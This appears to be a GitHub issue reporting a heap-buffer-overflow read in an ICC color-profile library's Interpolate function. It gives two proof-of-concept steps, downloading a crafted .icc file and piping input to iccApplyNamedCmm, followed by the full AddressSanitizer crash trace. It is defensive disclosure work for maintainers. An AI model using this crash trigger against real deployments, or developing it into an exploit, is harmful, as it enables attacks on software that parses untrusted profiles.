
HBO in CIccTagFloatNum<(icTagTypeSignature)>::Interpolate() at IccTagBasic.cpp:6789 #619

@xsscx

Description

@xsscx

Maintainer Repro

2026-02-24 23:30:27 UTC

PoC Replay

Step 1. wget https://github.com/xsscx/fuzz/raw/refs/heads/master/graphics/icc/hbo-CIccOpDefSubElement-Exec-IccMpeCalc_cpp-Line377.icc

Step 2. printf "'RGB '\nicEncodeFloat\n0.5 0.5 0.5\n" | iccApplyNamedCmm /dev/stdin 3 0 hbo-CIccOpDefSubElement-Exec-IccMpeCalc_cpp-Line377.icc 0

PoC Expected Output

git show --no-patch --oneline
...
cf28ef4 (HEAD -> master, origin/master, origin/HEAD) Fix: HUAF in CIccCmm::AddXform() (#616)
...
==32818==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x503000000568 at pc 0x761de3dd793c bp 0x7ffe6e7720a0 sp 0x7ffe6e772098
READ of size 4 at 0x503000000568 thread T0
    #0 0x761de3dd793b in CIccTagFloatNum<float, (icTagTypeSignature)1718367026>::Interpolate(float*, float, unsigned int, float*) const IccProfLib/IccTagBasic.cpp:6789:51
    #1 0x761de3c8ead8 in CIccOpDefSubElement::Exec(SIccCalcOp*, SIccOpState&) IccProfLib/IccMpeCalc.cpp:377:17
    #2 0x761de3c72504 in CIccCalculatorFunc::ApplySequence(CIccApplyMpeCalculator*, unsigned int, SIccCalcOp*) const IccProfLib/IccMpeCalc.cpp:3807:21
    #3 0x761de3c74f0f in CIccCalculatorFunc::Apply(CIccApplyMpeCalculator*) const IccProfLib/IccMpeCalc.cpp:3834:8
    #4 0x761de3b51107 in CIccXformMpe::Apply(CIccApplyXform*, float*, float const*) const IccProfLib/IccCmm.cpp:7613:9
    #5 0x761de3b77b34 in CIccApplyNamedColorCmm::Apply(float*, float const*) IccProfLib/IccCmm.cpp:9952:18
    #6 0x6476b5ec9764 in CIccNamedColorCmm::Apply(float*, float const*) Build/Cmake/../../IccProfLib/IccCmm.h:1841:95
    #7 0x6476b5ec9764 in main Tools/CmdLine/IccApplyNamedCmm/iccApplyNamedCmm.cpp:536:30
    #8 0x761de2e2a1c9 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #9 0x761de2e2a28a in __libc_start_main csu/../csu/libc-start.c:360:3
    #10 0x6476b5de9974 in _start (Build/Tools/IccApplyNamedCmm/iccApplyNamedCmm+0x6e974) (BuildId: 5597ccbe10b4bed0d35adcbdf84327e2c16d820e)

0x503000000568 is located 0 bytes after 24-byte region [0x503000000550,0x503000000568)
allocated by thread T0 here:
    #0 0x6476b5e84be0 in realloc (Build/Tools/IccApplyNamedCmm/iccApplyNamedCmm+0x109be0) (BuildId: 5597ccbe10b4bed0d35adcbdf84327e2c16d820e)
    #1 0x761de3ee63ed in icRealloc(void*, unsigned long) IccProfLib/IccUtil.cpp:122:12
    #2 0x761de3dd57a6 in CIccTagFloatNum<float, (icTagTypeSignature)1718367026>::SetSize(unsigned int, bool) IccProfLib/IccTagBasic.cpp:6637:15
    #3 0x761de3dd53e9 in CIccTagFloatNum<float, (icTagTypeSignature)1718367026>::Read(unsigned int, CIccIO*) IccProfLib/IccTagBasic.cpp:6483:10
    #4 0x761de3c10e0b in CIccMpeTintArray::Read(unsigned int, CIccIO*) IccProfLib/IccMpeBasic.cpp:3739:17
    #5 0x761de3c7fe73 in CIccMpeCalculator::Read(unsigned int, CIccIO*) IccProfLib/IccMpeCalc.cpp:4730:19
    #6 0x761de3ecc53a in CIccTagMultiProcessElement::Read(unsigned int, CIccIO*) IccProfLib/IccTagMPE.cpp:1068:21
    #7 0x761de3ce07c1 in CIccProfile::LoadTag(IccTagEntry*, CIccIO*, bool) IccProfLib/IccProfile.cpp:1336:14
    #8 0x761de3cdff42 in CIccProfile::FindTag(IccTagEntry&) IccProfLib/IccProfile.cpp:437:5
    #9 0x761de3ac29a4 in CIccXform::Create(CIccProfile*, bool, icRenderingIntent, icXformInterp, IIccProfileConnectionConditions*, icXformLutType, bool, CIccCreateXformHintManager*) IccProfLib/IccCmm.cpp:634:30
    #10 0x761de3b844c9 in CIccNamedColorCmm::AddXform(CIccProfile*, icRenderingIntent, icXformInterp, IIccProfileConnectionConditions*, icXformLutType, bool, CIccCreateXformHintManager*) IccProfLib/IccCmm.cpp:10759:17
    #11 0x761de3b80757 in CIccNamedColorCmm::AddXform(char const*, icRenderingIntent, icXformInterp, IIccProfileConnectionConditions*, icXformLutType, bool, CIccCreateXformHintManager*, bool) IccProfLib/IccCmm.cpp:10509:20
    #12 0x6476b5ec74e9 in main Tools/CmdLine/IccApplyNamedCmm/iccApplyNamedCmm.cpp:381:18
    #13 0x761de2e2a1c9 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #14 0x761de2e2a28a in __libc_start_main csu/../csu/libc-start.c:360:3
    #15 0x6476b5de9974 in _start (Build/Tools/IccApplyNamedCmm/iccApplyNamedCmm+0x6e974) (BuildId: 5597ccbe10b4bed0d35adcbdf84327e2c16d820e)

SUMMARY: AddressSanitizer: heap-buffer-overflow IccProfLib/IccTagBasic.cpp:6789:51 in CIccTagFloatNum<float, (icTagTypeSignature)1718367026>::Interpolate(float*, float, unsigned int, float*) const
Shadow bytes around the buggy address:
  0x503000000280: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
  0x503000000300: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
  0x503000000380: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x503000000400: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
  0x503000000480: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
=>0x503000000500: 00 fa fa fa 00 00 00 00 fa fa 00 00 00[fa]fa fa
  0x503000000580: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 00
  0x503000000600: fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00
  0x503000000680: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x503000000700: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
  0x503000000780: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==32818==ABORTING
